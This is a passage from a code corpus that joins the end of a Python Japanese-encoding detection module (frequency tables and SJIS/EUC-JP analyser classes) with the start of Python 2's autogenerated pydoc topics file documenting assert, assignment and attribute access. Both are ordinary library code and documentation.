(0,1,0,4,0,0,0,0,0,1,4,0,4,1,4,2,4,0,3,0,1,0,1,0,0,0,0,0,2,0,3,1,1,1,0,3,0,0,0,1,2,1,0,0,1,1,1,1,0,1,0,0,0,1,0,0,3,0,0,0,0,3,2,0,2,2,0,1,0,0,0,2,3,2,3,3,0,0,0,0,2,1,0), (0,5,1,5,0,3,0,3,0,5,4,4,5,1,5,3,3,0,4,3,4,3,5,3,4,3,3,2,4,3,4,3,3,0,3,3,1,4,4,3,4,4,4,3,4,5,5,3,2,3,1,1,3,3,1,3,1,1,3,3,2,4,5,3,3,5,0,4,0,3,0,4,4,3,5,3,3,0,3,4,0,4,3), (0,5,0,5,0,3,0,2,0,4,4,3,5,2,4,3,3,3,4,4,4,3,5,3,5,3,3,1,4,0,4,3,3,0,3,3,0,4,4,4,4,5,4,3,3,5,5,3,2,3,1,2,3,2,0,1,0,0,3,2,2,4,4,3,1,5,0,4,0,3,0,4,3,1,3,2,1,0,3,3,0,3,3), (0,4,0,5,0,5,0,4,0,4,5,5,5,3,4,3,3,2,5,4,4,3,5,3,5,3,4,0,4,3,4,4,3,2,4,4,3,4,5,4,4,5,5,0,3,5,5,4,1,3,3,2,3,3,1,3,1,0,4,3,1,4,4,3,4,5,0,4,0,2,0,4,3,4,4,3,3,0,4,0,0,5,5), (0,4,0,4,0,5,0,1,1,3,3,4,4,3,4,1,3,0,5,1,3,0,3,1,3,1,1,0,3,0,3,3,4,0,4,3,0,4,4,4,3,4,4,0,3,5,4,1,0,3,0,0,2,3,0,3,1,0,3,1,0,3,2,1,3,5,0,3,0,1,0,3,2,3,3,4,4,0,2,2,0,4,4), (2,4,0,5,0,4,0,3,0,4,5,5,4,3,5,3,5,3,5,3,5,2,5,3,4,3,3,4,3,4,5,3,2,1,5,4,3,2,3,4,5,3,4,1,2,5,4,3,0,3,3,0,3,2,0,2,3,0,4,1,0,3,4,3,3,5,0,3,0,1,0,4,5,5,5,4,3,0,4,2,0,3,5), (0,5,0,4,0,4,0,2,0,5,4,3,4,3,4,3,3,3,4,3,4,2,5,3,5,3,4,1,4,3,4,4,4,0,3,5,0,4,4,4,4,5,3,1,3,4,5,3,3,3,3,3,3,3,0,2,2,0,3,3,2,4,3,3,3,5,3,4,1,3,3,5,3,2,0,0,0,0,4,3,1,3,3), (0,1,0,3,0,3,0,1,0,1,3,3,3,2,3,3,3,0,3,0,0,0,3,1,3,0,0,0,2,2,2,3,0,0,3,2,0,1,2,4,1,3,3,0,0,3,3,3,0,1,0,0,2,1,0,0,3,0,3,1,0,3,0,0,1,3,0,2,0,1,0,3,3,1,3,3,0,0,1,1,0,3,3), (0,2,0,3,0,2,1,4,0,2,2,3,1,1,3,1,1,0,2,0,3,1,2,3,1,3,0,0,1,0,4,3,2,3,3,3,1,4,2,3,3,3,3,1,0,3,1,4,0,1,1,0,1,2,0,1,1,0,1,1,0,3,1,3,2,2,0,1,0,0,0,2,3,3,3,1,0,0,0,0,0,2,3), (0,5,0,4,0,5,0,2,0,4,5,5,3,3,4,3,3,1,5,4,4,2,4,4,4,3,4,2,4,3,5,5,4,3,3,4,3,3,5,5,4,5,5,1,3,4,5,3,1,4,3,1,3,3,0,3,3,1,4,3,1,4,5,3,3,5,0,4,0,3,0,5,3,3,1,4,3,0,4,0,1,5,3), (0,5,0,5,0,4,0,2,0,4,4,3,4,3,3,3,3,3,5,4,4,4,4,4,4,5,3,3,5,2,4,4,4,3,4,4,3,3,4,4,5,5,3,3,4,3,4,3,3,4,3,3,3,3,1,2,2,1,4,3,3,5,4,4,3,4,0,4,0,3,0,4,4,4,4,4,1,0,4,2,0,2,4), 
(0,4,0,4,0,3,0,1,0,3,5,2,3,0,3,0,2,1,4,2,3,3,4,1,4,3,3,2,4,1,3,3,3,0,3,3,0,0,3,3,3,5,3,3,3,3,3,2,0,2,0,0,2,0,0,2,0,0,1,0,0,3,1,2,2,3,0,3,0,2,0,4,4,3,3,4,1,0,3,0,0,2,4), (0,0,0,4,0,0,0,0,0,0,1,0,1,0,2,0,0,0,0,0,1,0,2,0,1,0,0,0,0,0,3,1,3,0,3,2,0,0,0,1,0,3,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,4,0,2,0,0,0,0,0,0,2), (0,2,1,3,0,2,0,2,0,3,3,3,3,1,3,1,3,3,3,3,3,3,4,2,2,1,2,1,4,0,4,3,1,3,3,3,2,4,3,5,4,3,3,3,3,3,3,3,0,1,3,0,2,0,0,1,0,0,1,0,0,4,2,0,2,3,0,3,3,0,3,3,4,2,3,1,4,0,1,2,0,2,3), (0,3,0,3,0,1,0,3,0,2,3,3,3,0,3,1,2,0,3,3,2,3,3,2,3,2,3,1,3,0,4,3,2,0,3,3,1,4,3,3,2,3,4,3,1,3,3,1,1,0,1,1,0,1,0,1,0,1,0,0,0,4,1,1,0,3,0,3,1,0,2,3,3,3,3,3,1,0,0,2,0,3,3), (0,0,0,0,0,0,0,0,0,0,3,0,2,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,3,0,3,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,2,0,2,3,0,0,0,0,0,0,0,0,3), (0,2,0,3,1,3,0,3,0,2,3,3,3,1,3,1,3,1,3,1,3,3,3,1,3,0,2,3,1,1,4,3,3,2,3,3,1,2,2,4,1,3,3,0,1,4,2,3,0,1,3,0,3,0,0,1,3,0,2,0,0,3,3,2,1,3,0,3,0,2,0,3,4,4,4,3,1,0,3,0,0,3,3), (0,2,0,1,0,2,0,0,0,1,3,2,2,1,3,0,1,1,3,0,3,2,3,1,2,0,2,0,1,1,3,3,3,0,3,3,1,1,2,3,2,3,3,1,2,3,2,0,0,1,0,0,0,0,0,0,3,0,1,0,0,2,1,2,1,3,0,3,0,0,0,3,4,4,4,3,2,0,2,0,0,2,4), (0,0,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,2,2,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,3,1,0,0,0,0,0,0,0,3), (0,3,0,3,0,2,0,3,0,3,3,3,2,3,2,2,2,0,3,1,3,3,3,2,3,3,0,0,3,0,3,2,2,0,2,3,1,4,3,4,3,3,2,3,1,5,4,4,0,3,1,2,1,3,0,3,1,1,2,0,2,3,1,3,1,3,0,3,0,1,0,3,3,4,4,2,1,0,2,1,0,2,4), (0,1,0,3,0,1,0,2,0,1,4,2,5,1,4,0,2,0,2,1,3,1,4,0,2,1,0,0,2,1,4,1,1,0,3,3,0,5,1,3,2,3,3,1,0,3,2,3,0,1,0,0,0,0,0,0,1,0,0,0,0,4,0,1,0,3,0,2,0,1,0,3,3,3,4,3,3,0,0,0,0,2,3), (0,0,0,1,0,0,0,0,0,0,2,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,1,0,0,1,0,0,0,0,0,3), 
(0,1,0,3,0,4,0,3,0,2,4,3,1,0,3,2,2,1,3,1,2,2,3,1,1,1,2,1,3,0,1,2,0,1,3,2,1,3,0,5,5,1,0,0,1,3,2,1,0,3,0,0,1,0,0,0,0,0,3,4,0,1,1,1,3,2,0,2,0,1,0,2,3,3,1,2,3,0,1,0,1,0,4), (0,0,0,1,0,3,0,3,0,2,2,1,0,0,4,0,3,0,3,1,3,0,3,0,3,0,1,0,3,0,3,1,3,0,3,3,0,0,1,2,1,1,1,0,1,2,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,2,2,1,2,0,0,2,0,0,0,0,2,3,3,3,3,0,0,0,0,1,4), (0,0,0,3,0,3,0,0,0,0,3,1,1,0,3,0,1,0,2,0,1,0,0,0,0,0,0,0,1,0,3,0,2,0,2,3,0,0,2,2,3,1,2,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,2,0,0,0,0,2,3), (2,4,0,5,0,5,0,4,0,3,4,3,3,3,4,3,3,3,4,3,4,4,5,4,5,5,5,2,3,0,5,5,4,1,5,4,3,1,5,4,3,4,4,3,3,4,3,3,0,3,2,0,2,3,0,3,0,0,3,3,0,5,3,2,3,3,0,3,0,3,0,3,4,5,4,5,3,0,4,3,0,3,4), (0,3,0,3,0,3,0,3,0,3,3,4,3,2,3,2,3,0,4,3,3,3,3,3,3,3,3,0,3,2,4,3,3,1,3,4,3,4,4,4,3,4,4,3,2,4,4,1,0,2,0,0,1,1,0,2,0,0,3,1,0,5,3,2,1,3,0,3,0,1,2,4,3,2,4,3,3,0,3,2,0,4,4), (0,3,0,3,0,1,0,0,0,1,4,3,3,2,3,1,3,1,4,2,3,2,4,2,3,4,3,0,2,2,3,3,3,0,3,3,3,0,3,4,1,3,3,0,3,4,3,3,0,1,1,0,1,0,0,0,4,0,3,0,0,3,1,2,1,3,0,4,0,1,0,4,3,3,4,3,3,0,2,0,0,3,3), (0,3,0,4,0,1,0,3,0,3,4,3,3,0,3,3,3,1,3,1,3,3,4,3,3,3,0,0,3,1,5,3,3,1,3,3,2,5,4,3,3,4,5,3,2,5,3,4,0,1,0,0,0,0,0,2,0,0,1,1,0,4,2,2,1,3,0,3,0,2,0,4,4,3,5,3,2,0,1,1,0,3,4), (0,5,0,4,0,5,0,2,0,4,4,3,3,2,3,3,3,1,4,3,4,1,5,3,4,3,4,0,4,2,4,3,4,1,5,4,0,4,4,4,4,5,4,1,3,5,4,2,1,4,1,1,3,2,0,3,1,0,3,2,1,4,3,3,3,4,0,4,0,3,0,4,4,4,3,3,3,0,4,2,0,3,4), (1,4,0,4,0,3,0,1,0,3,3,3,1,1,3,3,2,2,3,3,1,0,3,2,2,1,2,0,3,1,2,1,2,0,3,2,0,2,2,3,3,4,3,0,3,3,1,2,0,1,1,3,1,2,0,0,3,0,1,1,0,3,2,2,3,3,0,3,0,0,0,2,3,3,4,3,3,0,1,0,0,1,4), (0,4,0,4,0,4,0,0,0,3,4,4,3,1,4,2,3,2,3,3,3,1,4,3,4,0,3,0,4,2,3,3,2,2,5,4,2,1,3,4,3,4,3,1,3,3,4,2,0,2,1,0,3,3,0,0,2,0,3,1,0,4,4,3,4,3,0,4,0,1,0,2,4,4,4,4,4,0,3,2,0,3,3), (0,0,0,1,0,4,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,3,2,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,2), 
(0,2,0,3,0,4,0,4,0,1,3,3,3,0,4,0,2,1,2,1,1,1,2,0,3,1,1,0,1,0,3,1,0,0,3,3,2,0,1,1,0,0,0,0,0,1,0,2,0,2,2,0,3,1,0,0,1,0,1,1,0,1,2,0,3,0,0,0,0,1,0,0,3,3,4,3,1,0,1,0,3,0,2), (0,0,0,3,0,5,0,0,0,0,1,0,2,0,3,1,0,1,3,0,0,0,2,0,0,0,1,0,0,0,1,1,0,0,4,0,0,0,2,3,0,1,4,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,1,0,0,0,0,0,0,0,2,0,0,3,0,0,0,0,0,3), (0,2,0,5,0,5,0,1,0,2,4,3,3,2,5,1,3,2,3,3,3,0,4,1,2,0,3,0,4,0,2,2,1,1,5,3,0,0,1,4,2,3,2,0,3,3,3,2,0,2,4,1,1,2,0,1,1,0,3,1,0,1,3,1,2,3,0,2,0,0,0,1,3,5,4,4,4,0,3,0,0,1,3), (0,4,0,5,0,4,0,4,0,4,5,4,3,3,4,3,3,3,4,3,4,4,5,3,4,5,4,2,4,2,3,4,3,1,4,4,1,3,5,4,4,5,5,4,4,5,5,5,2,3,3,1,4,3,1,3,3,0,3,3,1,4,3,4,4,4,0,3,0,4,0,3,3,4,4,5,0,0,4,3,0,4,5), (0,4,0,4,0,3,0,3,0,3,4,4,4,3,3,2,4,3,4,3,4,3,5,3,4,3,2,1,4,2,4,4,3,1,3,4,2,4,5,5,3,4,5,4,1,5,4,3,0,3,2,2,3,2,1,3,1,0,3,3,3,5,3,3,3,5,4,4,2,3,3,4,3,3,3,2,1,0,3,2,1,4,3), (0,4,0,5,0,4,0,3,0,3,5,5,3,2,4,3,4,0,5,4,4,1,4,4,4,3,3,3,4,3,5,5,2,3,3,4,1,2,5,5,3,5,5,2,3,5,5,4,0,3,2,0,3,3,1,1,5,1,4,1,0,4,3,2,3,5,0,4,0,3,0,5,4,3,4,3,0,0,4,1,0,4,4), (1,3,0,4,0,2,0,2,0,2,5,5,3,3,3,3,3,0,4,2,3,4,4,4,3,4,0,0,3,4,5,4,3,3,3,3,2,5,5,4,5,5,5,4,3,5,5,5,1,3,1,0,1,0,0,3,2,0,4,2,0,5,2,3,2,4,1,3,0,3,0,4,5,4,5,4,3,0,4,2,0,5,4), (0,3,0,4,0,5,0,3,0,3,4,4,3,2,3,2,3,3,3,3,3,2,4,3,3,2,2,0,3,3,3,3,3,1,3,3,3,0,4,4,3,4,4,1,1,4,4,2,0,3,1,0,1,1,0,4,1,0,2,3,1,3,3,1,3,4,0,3,0,1,0,3,1,3,0,0,1,0,2,0,0,4,4), (0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0), (0,3,0,3,0,2,0,3,0,1,5,4,3,3,3,1,4,2,1,2,3,4,4,2,4,4,5,0,3,1,4,3,4,0,4,3,3,3,2,3,2,5,3,4,3,2,2,3,0,0,3,0,2,1,0,1,2,0,0,0,0,2,1,1,3,1,0,2,0,4,0,3,4,4,4,5,2,0,2,0,0,1,3), (0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,1,0,0,1,1,0,0,0,4,2,1,1,0,1,0,3,2,0,0,3,1,1,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,1,0,0,0,2,0,0,0,1,4,0,4,2,1,0,0,0,0,0,1), 
(0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,1,0,1,0,0,0,0,3,1,0,0,0,2,0,2,1,0,0,1,2,1,0,1,1,0,0,3,0,0,0,0,0,0,0,0,0,0,0,1,3,1,0,0,0,0,0,1,0,0,2,1,0,0,0,0,0,0,0,0,2), (0,4,0,4,0,4,0,3,0,4,4,3,4,2,4,3,2,0,4,4,4,3,5,3,5,3,3,2,4,2,4,3,4,3,1,4,0,2,3,4,4,4,3,3,3,4,4,4,3,4,1,3,4,3,2,1,2,1,3,3,3,4,4,3,3,5,0,4,0,3,0,4,3,3,3,2,1,0,3,0,0,3,3), (0,4,0,3,0,3,0,3,0,3,5,5,3,3,3,3,4,3,4,3,3,3,4,4,4,3,3,3,3,4,3,5,3,3,1,3,2,4,5,5,5,5,4,3,4,5,5,3,2,2,3,3,3,3,2,3,3,1,2,3,2,4,3,3,3,4,0,4,0,2,0,4,3,2,2,1,2,0,3,0,0,4,1), ) class JapaneseContextAnalysis: def __init__(self): self.reset() def reset(self): self._mTotalRel = 0 # total sequence received # category counters, each interger counts sequence in its category self._mRelSample = [0] * NUM_OF_CATEGORY # if last byte in current buffer is not the last byte of a character, # we need to know how many bytes to skip in next buffer self._mNeedToSkipCharNum = 0 self._mLastCharOrder = -1 # The order of previous char # If this flag is set to True, detection is done and conclusion has # been made self._mDone = False def feed(self, aBuf, aLen): if self._mDone: return # The buffer we got is byte oriented, and a character may span in more than one # buffers. In case the last one or two byte in last buffer is not # complete, we record how many byte needed to complete that character # and skip these bytes here. We can choose to record those bytes as # well and analyse the character once it is complete, but since a # character will not make much difference, by simply skipping # this character will simply our logic and improve performance. 
i = self._mNeedToSkipCharNum while i < aLen: order, charLen = self.get_order(aBuf[i:i + 2]) i += charLen if i > aLen: self._mNeedToSkipCharNum = i - aLen self._mLastCharOrder = -1 else: if (order != -1) and (self._mLastCharOrder != -1): self._mTotalRel += 1 if self._mTotalRel > MAX_REL_THRESHOLD: self._mDone = True break self._mRelSample[jp2CharContext[self._mLastCharOrder][order]] += 1 self._mLastCharOrder = order def got_enough_data(self): return self._mTotalRel > ENOUGH_REL_THRESHOLD def get_confidence(self): # This is just one way to calculate confidence. It works well for me. if self._mTotalRel > MINIMUM_DATA_THRESHOLD: return (self._mTotalRel - self._mRelSample[0]) / self._mTotalRel else: return DONT_KNOW def get_order(self, aBuf): return -1, 1 class SJISContextAnalysis(JapaneseContextAnalysis): def get_order(self, aBuf): if not aBuf: return -1, 1 # find out current char's byte length first_char = wrap_ord(aBuf[0]) if ((0x81 <= first_char <= 0x9F) or (0xE0 <= first_char <= 0xFC)): charLen = 2 else: charLen = 1 # return its order if it is hiragana if len(aBuf) > 1: second_char = wrap_ord(aBuf[1]) if (first_char == 202) and (0x9F <= second_char <= 0xF1): return second_char - 0x9F, charLen return -1, charLen class EUCJPContextAnalysis(JapaneseContextAnalysis): def get_order(self, aBuf): if not aBuf: return -1, 1 # find out current char's byte length first_char = wrap_ord(aBuf[0]) if (first_char == 0x8E) or (0xA1 <= first_char <= 0xFE): charLen = 2 elif first_char == 0x8F: charLen = 3 else: charLen = 1 # return its order if it is hiragana if len(aBuf) > 1: second_char = wrap_ord(aBuf[1]) if (first_char == 0xA4) and (0xA1 <= second_char <= 0xF3): return second_char - 0xA1, charLen return -1, charLen # flake8: noqa
gpl-2.0
JacerOmri/PokemonGo-Bot-Desktop
pywin/Lib/pydoc_data/topics.py
8
663244
# -*- coding: utf-8 -*- # Autogenerated by Sphinx on Sat Jun 11 14:41:12 2016 topics = {'assert': '\n' 'The "assert" statement\n' '**********************\n' '\n' 'Assert statements are a convenient way to insert debugging ' 'assertions\n' 'into a program:\n' '\n' ' assert_stmt ::= "assert" expression ["," expression]\n' '\n' 'The simple form, "assert expression", is equivalent to\n' '\n' ' if __debug__:\n' ' if not expression: raise AssertionError\n' '\n' 'The extended form, "assert expression1, expression2", is ' 'equivalent to\n' '\n' ' if __debug__:\n' ' if not expression1: raise AssertionError(expression2)\n' '\n' 'These equivalences assume that "__debug__" and "AssertionError" ' 'refer\n' 'to the built-in variables with those names. In the current\n' 'implementation, the built-in variable "__debug__" is "True" under\n' 'normal circumstances, "False" when optimization is requested ' '(command\n' 'line option -O). The current code generator emits no code for an\n' 'assert statement when optimization is requested at compile time. ' 'Note\n' 'that it is unnecessary to include the source code for the ' 'expression\n' 'that failed in the error message; it will be displayed as part of ' 'the\n' 'stack trace.\n' '\n' 'Assignments to "__debug__" are illegal. 
The value for the ' 'built-in\n' 'variable is determined when the interpreter starts.\n', 'assignment': '\n' 'Assignment statements\n' '*********************\n' '\n' 'Assignment statements are used to (re)bind names to values and ' 'to\n' 'modify attributes or items of mutable objects:\n' '\n' ' assignment_stmt ::= (target_list "=")+ (expression_list | ' 'yield_expression)\n' ' target_list ::= target ("," target)* [","]\n' ' target ::= identifier\n' ' | "(" target_list ")"\n' ' | "[" [target_list] "]"\n' ' | attributeref\n' ' | subscription\n' ' | slicing\n' '\n' '(See section Primaries for the syntax definitions for the last ' 'three\n' 'symbols.)\n' '\n' 'An assignment statement evaluates the expression list ' '(remember that\n' 'this can be a single expression or a comma-separated list, the ' 'latter\n' 'yielding a tuple) and assigns the single resulting object to ' 'each of\n' 'the target lists, from left to right.\n' '\n' 'Assignment is defined recursively depending on the form of the ' 'target\n' '(list). When a target is part of a mutable object (an ' 'attribute\n' 'reference, subscription or slicing), the mutable object must\n' 'ultimately perform the assignment and decide about its ' 'validity, and\n' 'may raise an exception if the assignment is unacceptable. 
The ' 'rules\n' 'observed by various types and the exceptions raised are given ' 'with the\n' 'definition of the object types (see section The standard type\n' 'hierarchy).\n' '\n' 'Assignment of an object to a target list is recursively ' 'defined as\n' 'follows.\n' '\n' '* If the target list is a single target: The object is ' 'assigned to\n' ' that target.\n' '\n' '* If the target list is a comma-separated list of targets: ' 'The\n' ' object must be an iterable with the same number of items as ' 'there\n' ' are targets in the target list, and the items are assigned, ' 'from\n' ' left to right, to the corresponding targets.\n' '\n' 'Assignment of an object to a single target is recursively ' 'defined as\n' 'follows.\n' '\n' '* If the target is an identifier (name):\n' '\n' ' * If the name does not occur in a "global" statement in the\n' ' current code block: the name is bound to the object in the ' 'current\n' ' local namespace.\n' '\n' ' * Otherwise: the name is bound to the object in the current ' 'global\n' ' namespace.\n' '\n' ' The name is rebound if it was already bound. This may cause ' 'the\n' ' reference count for the object previously bound to the name ' 'to reach\n' ' zero, causing the object to be deallocated and its ' 'destructor (if it\n' ' has one) to be called.\n' '\n' '* If the target is a target list enclosed in parentheses or ' 'in\n' ' square brackets: The object must be an iterable with the ' 'same number\n' ' of items as there are targets in the target list, and its ' 'items are\n' ' assigned, from left to right, to the corresponding targets.\n' '\n' '* If the target is an attribute reference: The primary ' 'expression in\n' ' the reference is evaluated. It should yield an object with\n' ' assignable attributes; if this is not the case, "TypeError" ' 'is\n' ' raised. 
That object is then asked to assign the assigned ' 'object to\n' ' the given attribute; if it cannot perform the assignment, it ' 'raises\n' ' an exception (usually but not necessarily ' '"AttributeError").\n' '\n' ' Note: If the object is a class instance and the attribute ' 'reference\n' ' occurs on both sides of the assignment operator, the RHS ' 'expression,\n' ' "a.x" can access either an instance attribute or (if no ' 'instance\n' ' attribute exists) a class attribute. The LHS target "a.x" ' 'is always\n' ' set as an instance attribute, creating it if necessary. ' 'Thus, the\n' ' two occurrences of "a.x" do not necessarily refer to the ' 'same\n' ' attribute: if the RHS expression refers to a class ' 'attribute, the\n' ' LHS creates a new instance attribute as the target of the\n' ' assignment:\n' '\n' ' class Cls:\n' ' x = 3 # class variable\n' ' inst = Cls()\n' ' inst.x = inst.x + 1 # writes inst.x as 4 leaving Cls.x ' 'as 3\n' '\n' ' This description does not necessarily apply to descriptor\n' ' attributes, such as properties created with "property()".\n' '\n' '* If the target is a subscription: The primary expression in ' 'the\n' ' reference is evaluated. It should yield either a mutable ' 'sequence\n' ' object (such as a list) or a mapping object (such as a ' 'dictionary).\n' ' Next, the subscript expression is evaluated.\n' '\n' ' If the primary is a mutable sequence object (such as a ' 'list), the\n' ' subscript must yield a plain integer. If it is negative, ' 'the\n' " sequence's length is added to it. The resulting value must " 'be a\n' " nonnegative integer less than the sequence's length, and " 'the\n' ' sequence is asked to assign the assigned object to its item ' 'with\n' ' that index. 
If the index is out of range, "IndexError" is ' 'raised\n' ' (assignment to a subscripted sequence cannot add new items ' 'to a\n' ' list).\n' '\n' ' If the primary is a mapping object (such as a dictionary), ' 'the\n' " subscript must have a type compatible with the mapping's key " 'type,\n' ' and the mapping is then asked to create a key/datum pair ' 'which maps\n' ' the subscript to the assigned object. This can either ' 'replace an\n' ' existing key/value pair with the same key value, or insert a ' 'new\n' ' key/value pair (if no key with the same value existed).\n' '\n' '* If the target is a slicing: The primary expression in the\n' ' reference is evaluated. It should yield a mutable sequence ' 'object\n' ' (such as a list). The assigned object should be a sequence ' 'object\n' ' of the same type. Next, the lower and upper bound ' 'expressions are\n' ' evaluated, insofar they are present; defaults are zero and ' 'the\n' " sequence's length. The bounds should evaluate to (small) " 'integers.\n' " If either bound is negative, the sequence's length is added " 'to it.\n' ' The resulting bounds are clipped to lie between zero and ' 'the\n' " sequence's length, inclusive. Finally, the sequence object " 'is asked\n' ' to replace the slice with the items of the assigned ' 'sequence. 
The\n' ' length of the slice may be different from the length of the ' 'assigned\n' ' sequence, thus changing the length of the target sequence, ' 'if the\n' ' object allows it.\n' '\n' '**CPython implementation detail:** In the current ' 'implementation, the\n' 'syntax for targets is taken to be the same as for expressions, ' 'and\n' 'invalid syntax is rejected during the code generation phase, ' 'causing\n' 'less detailed error messages.\n' '\n' 'WARNING: Although the definition of assignment implies that ' 'overlaps\n' "between the left-hand side and the right-hand side are 'safe' " '(for\n' 'example "a, b = b, a" swaps two variables), overlaps *within* ' 'the\n' 'collection of assigned-to variables are not safe! For ' 'instance, the\n' 'following program prints "[0, 2]":\n' '\n' ' x = [0, 1]\n' ' i = 0\n' ' i, x[i] = 1, 2\n' ' print x\n' '\n' '\n' 'Augmented assignment statements\n' '===============================\n' '\n' 'Augmented assignment is the combination, in a single ' 'statement, of a\n' 'binary operation and an assignment statement:\n' '\n' ' augmented_assignment_stmt ::= augtarget augop ' '(expression_list | yield_expression)\n' ' augtarget ::= identifier | attributeref | ' 'subscription | slicing\n' ' augop ::= "+=" | "-=" | "*=" | "/=" | ' '"//=" | "%=" | "**="\n' ' | ">>=" | "<<=" | "&=" | "^=" | "|="\n' '\n' '(See section Primaries for the syntax definitions for the last ' 'three\n' 'symbols.)\n' '\n' 'An augmented assignment evaluates the target (which, unlike ' 'normal\n' 'assignment statements, cannot be an unpacking) and the ' 'expression\n' 'list, performs the binary operation specific to the type of ' 'assignment\n' 'on the two operands, and assigns the result to the original ' 'target.\n' 'The target is only evaluated once.\n' '\n' 'An augmented assignment expression like "x += 1" can be ' 'rewritten as\n' '"x = x + 1" to achieve a similar, but not exactly equal ' 'effect. In the\n' 'augmented version, "x" is only evaluated once. 
Also, when ' 'possible,\n' 'the actual operation is performed *in-place*, meaning that ' 'rather than\n' 'creating a new object and assigning that to the target, the ' 'old object\n' 'is modified instead.\n' '\n' 'With the exception of assigning to tuples and multiple targets ' 'in a\n' 'single statement, the assignment done by augmented assignment\n' 'statements is handled the same way as normal assignments. ' 'Similarly,\n' 'with the exception of the possible *in-place* behavior, the ' 'binary\n' 'operation performed by augmented assignment is the same as the ' 'normal\n' 'binary operations.\n' '\n' 'For targets which are attribute references, the same caveat ' 'about\n' 'class and instance attributes applies as for regular ' 'assignments.\n', 'atom-identifiers': '\n' 'Identifiers (Names)\n' '*******************\n' '\n' 'An identifier occurring as an atom is a name. See ' 'section Identifiers\n' 'and keywords for lexical definition and section Naming ' 'and binding for\n' 'documentation of naming and binding.\n' '\n' 'When the name is bound to an object, evaluation of the ' 'atom yields\n' 'that object. When a name is not bound, an attempt to ' 'evaluate it\n' 'raises a "NameError" exception.\n' '\n' '**Private name mangling:** When an identifier that ' 'textually occurs in\n' 'a class definition begins with two or more underscore ' 'characters and\n' 'does not end in two or more underscores, it is ' 'considered a *private\n' 'name* of that class. Private names are transformed to a ' 'longer form\n' 'before code is generated for them. The transformation ' 'inserts the\n' 'class name, with leading underscores removed and a ' 'single underscore\n' 'inserted, in front of the name. For example, the ' 'identifier "__spam"\n' 'occurring in a class named "Ham" will be transformed to ' '"_Ham__spam".\n' 'This transformation is independent of the syntactical ' 'context in which\n' 'the identifier is used. 
If the transformed name is ' 'extremely long\n' '(longer than 255 characters), implementation defined ' 'truncation may\n' 'happen. If the class name consists only of underscores, ' 'no\n' 'transformation is done.\n', 'atom-literals': '\n' 'Literals\n' '********\n' '\n' 'Python supports string literals and various numeric ' 'literals:\n' '\n' ' literal ::= stringliteral | integer | longinteger\n' ' | floatnumber | imagnumber\n' '\n' 'Evaluation of a literal yields an object of the given type ' '(string,\n' 'integer, long integer, floating point number, complex ' 'number) with the\n' 'given value. The value may be approximated in the case of ' 'floating\n' 'point and imaginary (complex) literals. See section ' 'Literals for\n' 'details.\n' '\n' 'All literals correspond to immutable data types, and hence ' 'the\n' "object's identity is less important than its value. " 'Multiple\n' 'evaluations of literals with the same value (either the ' 'same\n' 'occurrence in the program text or a different occurrence) ' 'may obtain\n' 'the same object or a different object with the same ' 'value.\n', 'attribute-access': '\n' 'Customizing attribute access\n' '****************************\n' '\n' 'The following methods can be defined to customize the ' 'meaning of\n' 'attribute access (use of, assignment to, or deletion of ' '"x.name") for\n' 'class instances.\n' '\n' 'object.__getattr__(self, name)\n' '\n' ' Called when an attribute lookup has not found the ' 'attribute in the\n' ' usual places (i.e. it is not an instance attribute ' 'nor is it found\n' ' in the class tree for "self"). "name" is the ' 'attribute name. This\n' ' method should return the (computed) attribute value ' 'or raise an\n' ' "AttributeError" exception.\n' '\n' ' Note that if the attribute is found through the ' 'normal mechanism,\n' ' "__getattr__()" is not called. (This is an ' 'intentional asymmetry\n' ' between "__getattr__()" and "__setattr__()".) 
This is ' 'done both for\n' ' efficiency reasons and because otherwise ' '"__getattr__()" would have\n' ' no way to access other attributes of the instance. ' 'Note that at\n' ' least for instance variables, you can fake total ' 'control by not\n' ' inserting any values in the instance attribute ' 'dictionary (but\n' ' instead inserting them in another object). See the\n' ' "__getattribute__()" method below for a way to ' 'actually get total\n' ' control in new-style classes.\n' '\n' 'object.__setattr__(self, name, value)\n' '\n' ' Called when an attribute assignment is attempted. ' 'This is called\n' ' instead of the normal mechanism (i.e. store the value ' 'in the\n' ' instance dictionary). *name* is the attribute name, ' '*value* is the\n' ' value to be assigned to it.\n' '\n' ' If "__setattr__()" wants to assign to an instance ' 'attribute, it\n' ' should not simply execute "self.name = value" --- ' 'this would cause\n' ' a recursive call to itself. Instead, it should ' 'insert the value in\n' ' the dictionary of instance attributes, e.g., ' '"self.__dict__[name] =\n' ' value". For new-style classes, rather than accessing ' 'the instance\n' ' dictionary, it should call the base class method with ' 'the same\n' ' name, for example, "object.__setattr__(self, name, ' 'value)".\n' '\n' 'object.__delattr__(self, name)\n' '\n' ' Like "__setattr__()" but for attribute deletion ' 'instead of\n' ' 